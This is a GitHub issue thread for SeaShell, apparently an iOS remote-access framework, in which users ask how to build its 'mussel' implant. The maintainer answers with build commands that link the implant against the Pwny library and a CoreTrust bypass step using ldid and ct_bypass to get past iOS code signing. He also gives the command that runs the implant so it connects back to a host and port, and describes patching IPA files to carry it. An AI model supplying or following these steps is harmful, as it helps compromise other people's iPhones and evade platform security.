### ISSUE TITLE
Mussel Makefile failed

### ISSUE THREAD

**Issue by zh-hl** [EntySec/SeaShell#44]
Hi, first of all thank you for the awesome work.

When I try to `make all` and `make install`, it didn't generate mussel binary.
And when I try to manually compile `mussel.m`, it says:
`mussel.m:27:10: fatal error: 'core.h' file not found`.
How do I fix this issue? Am I missing something?

Thank you

**Comment by enty8080** [comment]
Hello, @zh-hl 

Mussel binary (implant) should be compiled with [Pwny](https://github.com/EntySec/Pwny). I'll guide you through the whole process. There are instructions on how to build Pwny library in README but here is a quick list:

**1.** Clone Pwny to your working directory:

```
git clone https://github.com/EntySec/Pwny
cd Pwny
```

**2.** Build dependencies:

```
make TARGET=aarch64-apple-iphone SDK=<path to SDK>
```

**NOTE:** `SDK` is required, you can find compatible SDKs [here](https://github.com/theos/sdks). It is recommended to use `iPhoneOS15.6` SDK because this is the one I use.

**3.** Move `mussel.m` to Pwny directory and compile it with library:

```
cmake -DCMAKE_OSX_SYSROOT=<path to SDK> -DCMAKE_TOOLCHAIN_FILE=toolchain/cmake/aarch64-apple-iphone.cmake -DSOURCE=mussel.m -B build
cmake --build build
```

**4.** Apply CoreTrust bypass to Mussel implant.

```
ldid -Sdeps/sign.plist build/main.app/main
ct_bypass -i build/main.app/main -o mussel -r
```

**NOTE:** To have `ct_bypass` on you system you will need to build sources from [here](https://github.com/opa334/ChOma/tree/main/tests/ct_bypass) and install resulted binary to your PATH.

Now you should have `mussel` executable file in current working directory. You can upload it on device and execute it from terminal using this command:

```
./mussel <base64 of host:port>
```

Build process is quite complicated, I know. Thats why I prefer not to publish these instructions and compile implant by myself. By the way, you don't need to compile it yourself, you can find working example under `seashell/data/Mussel.app/mussel`. It is the same executable that you are trying to build.

To generate working IPA sample use `ipa build` or `ipa patch` to patch existing IPA file.
I hope this helped.

Kind regards,
Ivan Nikolskiy (@enty8080)

**Comment by huy-nh2x** [comment]
Hi,
I've been following your instructions to re-build the mussel. Everything works fine but when I run it on my iphone, it does not work. But when I use your pre-build binary, it works without any issue. 

![Image](https://github.com/user-attachments/assets/715dd1cb-c5e7-40a4-8931-1130b4388495)

How do I fix this issue?

**Comment by enty8080** [comment]
@huy-nh2x Did you do `ldid -Sdeps/sign.plist build/main.app/main` before `ct_bypass`?

**Comment by huy-nh2x** [comment]
Yes I did

**Comment by huy-nh2x** [comment]
Yes I did

**Comment by huy-nh2x** [comment]
Hello, 
I'm having a new issue related to building process. I have set DEBUG to ON in CMakeLists file in Pwny repo, then I repeat building process like you said above. But when I run it in my iphone, no log was shown. I have tried to change stderr to stdout in vfprintf() call in log_debug() but nothing happen  

![Image](https://github.com/user-attachments/assets/fd0f4e40-69ad-4859-8e2a-b4481bdc6c7b)

![Image](https://github.com/user-attachments/assets/62e5cbd5-5140-448d-872e-f01652d2884e)
